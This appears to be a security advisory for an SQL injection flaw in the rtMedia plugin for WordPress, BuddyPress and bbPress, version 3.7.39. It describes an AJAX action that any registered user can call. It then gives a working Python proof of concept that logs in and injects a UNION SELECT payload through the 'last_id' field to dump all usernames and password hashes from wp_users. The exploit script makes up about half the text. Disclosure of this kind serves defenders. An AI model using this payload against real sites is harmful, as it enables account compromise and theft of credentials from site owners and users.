rtMedia for WordPress, BuddyPress & bbPress 3.7.39 – SQL Injection

Description

When initialized, the rtMedia will include and instantiate certain classes if BuddyPress is installed. One of these classes is RTMediaActivityUpgrade, contained within the file ‘app/importers/RTMediaActivityUpgrade.php’. This class is instantiated in the file ‘admin/RTMediaAdmin.php,’ line 110, if the class ‘BuddyPress’ is available.

Once instantiated, the RTMediaActivityUpgrade class adds an AJAX method called ‘rtmedia_activity_upgrade’. This AJAX method is callable by any registered user, and is susceptible to MySQL Injection.

Proof of Concept

import requests,json
s = requests.session()
target = 'http://localhost'

url = '%s/wp-login.php'%target
payload = {
	"log":"test",
	"pwd":"test",
	"wp-submit":"Log+In"
}
r = s.post(url, data=payload)

url = '%s/wp-admin/admin-ajax.php'%target
payload = {
	"action":"rtmedia_activity_upgrade",
	"last_id":"0 AND 1=0 GROUP BY id UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,(select group_concat(concat_ws(char(58),wp_users.user_login,wp_users.user_pass)) from wp_users group by 1=1),13,14,15,16,17,18,19,20,21,22,23,24 FROM wp_rt_rtm_media GROUP BY id--"
}
r = s.post(url, data=payload)

print json.loads(r.text)['activity_id']